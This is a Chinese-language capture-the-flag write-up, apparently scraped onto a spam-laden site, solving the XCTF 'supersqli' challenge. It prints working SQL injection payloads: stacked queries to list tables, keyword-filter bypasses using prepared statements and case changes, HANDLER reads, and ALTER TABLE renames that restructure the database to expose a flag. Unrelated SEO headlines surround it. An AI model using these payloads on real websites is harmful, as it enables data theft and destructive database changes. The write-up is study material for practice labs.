当前位置: 首页 > news >正文

兰州网站建设企业名录建网站权威机构

兰州网站建设企业名录,建网站权威机构,上海 网站制作,免费ppt模板下载公众号XCTF_Web_高手进阶区 supersqli supersqli 这里使用谷歌浏览器 拿到题目后,发现是单引号报错字符型注入 用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。 使用union select联合查询,发现…

XCTF_Web_高手进阶区

  • supersqli

supersqli

这里使用谷歌浏览器
拿到题目后,发现是单引号报错字符型注入
在这里插入图片描述
用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。
使用union select联合查询,发现关键字select被正则过滤了
在这里插入图片描述
因此,需要绕过select的过滤
解法一:
(1)堆叠注入/?inject=-1’;show tables --+
在这里插入图片描述
(2)发现了两张表,分别查询两张表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在这里插入图片描述
/?inject=-1’;show columns from words --+
在这里插入图片描述
(3)发现了flag在第一个表中,接下来就是要查看flag的内容了。但是select被过滤了,这里可以采用预编译的方式绕过。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
(4)这里用strstr函数过滤了’set’和’prepare’关键词,利用strstr不能区分大小写,将其改为大写即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在这里插入图片描述
解法二:
handler查询
在查找到有两张表的前提下进行
(1)使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述
解法三:
(1)修改表名和列名,在查找到两个表后,看一下第二个表
在这里插入图片描述
(2)其中有一个列就是data列,是可以进行查询的。所以这里将表1919810931114514名字改为words,flag列名字改为id,就可以查询flag的内容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table`1919810931114514` rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点
(3)然后用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述

http://www.yayakq.cn/news/463712/

相关文章:

  • 网站建设_网站设计 app制作建站属于什么行业
  • 优秀个人网站设计欣赏网站关键词推广价格
  • 金融审核网站制作做网站公司 陕西渭南
  • 网站域名解析时间平面设计师招聘广告文案
  • 长沙正规官网建站网站开发人员是什么
  • 哪里制作网站好福州快速网站建设
  • qq官方网站wordpress点赞排行榜
  • 男通网站哪个好用网站设计主题有哪些
  • 网站充值接口怎么做长沙给中小企业做网站的公司
  • 百度商桥怎样绑定网站wordpress 学校模板
  • 网站搭建的人宝安区是深圳最差的区
  • 网站制作成品免费建站的平台
  • 天蝎网站推广优化网站建设属于什么税
  • 网站认证是什么意思怎么用源码搭建网站
  • 怎样搭建一个企业网站跳转短链接生成
  • 网盘怎么做电影网站开发自己的app多少钱
  • 网站建设技术风险爱站长工具综合查询
  • 游戏网站建设教程wordpress仪表盘改名
  • 网站建设的主要工作国内信息图制作网站
  • 钓鱼转转网站在线生成软件国际知名设计公司赛瑞的logo
  • 建设银行官方网站登录电脑版网站建设优化合同
  • 做淘宝客网站需要工商营业执照重庆网站建设制作设计
  • 太原网站推广教程北京大厂网站建设
  • 视觉传达设计网站wordpress 菜单 数据库
  • 做旅游网约车的网站珠市口网站建设
  • 贵州建设厅网站报名系统大型公司网站建设目标
  • 北京网站优化效果国外优秀的网站
  • 网站推广在哪些平台做外链wordpress分页
  • 律师做网站有用海南新闻在线观看
  • 网站导航栏特效360建筑网中级机械工程师招聘